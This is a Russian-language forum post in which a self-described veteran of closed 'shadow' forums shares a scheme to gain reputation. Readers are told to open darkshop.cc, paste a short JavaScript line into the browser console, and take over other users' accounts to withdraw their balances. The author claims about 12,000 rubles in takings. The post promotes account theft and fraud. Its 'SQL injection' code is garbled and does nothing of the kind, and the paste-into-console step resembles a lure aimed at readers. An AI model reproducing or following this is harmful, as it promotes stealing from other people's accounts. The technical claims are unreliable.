Отправлено Сегодня, 19:01

Привет, мальчишки, и, возможно, девчонки. Я – Очень давнешний пользователь теневых форумов.

Прям теневых-теневых, закрытых. Решил вылазить из прям черноты и перебираться ближе к вам, в самый клирнет. Ради расширения кругозора или не знаю чего. Разносторонним быть хочу J.

Все мы знаем и/или понимаем, что на форумах для получения плюшек или восприятия пользователя нужна репа. Я привык ко всему и сразу, для мгновенного заслуживания доверия к моей персоне хочу слить вам тему прям с тех самых «Теневых-теневых и закрытых форумов» Конкретнее, с cih.ms. Я не буду тянуть кота за яйца и сразу перейду к делу: Речь пойдёт о Error майнинге. Для более понятливых – SQL инъекция. Работаем.



- Переходим на сайт darkshop.cc



- Открываем консоль браузера, что делается следующим образом для браузеров:



ХРОМ И ОПЕРА - CNTRL + SHIFТ + J

МОЗИЛА - CNТRL + SНIFТ + К



- Вводим JS код:





_0x699b=["asd"];ja= _0x699b[0];a()

SjqmS

» после чего должны выпадать хэши. После переходу по хэшу авторизуемся под аккаунтом пользователя(Сегодня был даже модератор). Попадаются аккаунты с балансом, который мы можем вывести в пару кликов. На аккак так же можно добыть кучу всяких плюшек, типа аккаунтов в вк, прокси, впны и так далее.Но, главное для нас – баланс

J

. За последний час я вывел с шопа чуть больше 12 тысяч рублей, что было максимумом за сегодня. По теме работают только 3 человека, я 4ый. Опять же хочу повторится, что тему сливаю не из-за своей доброты, а исключительно для набора репутации. Так же, потому что тема умирает и аккаунтов начинает брутится всё меньше. На мой взгляд, теме осталось жить несколько часов. Короче, добивайте уже почти добитого медведя.Жду плюсов, спасибо и пожалуйста

J

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- В том случае, если не пофиксили – начнут появляться надписи, а-ля «Нт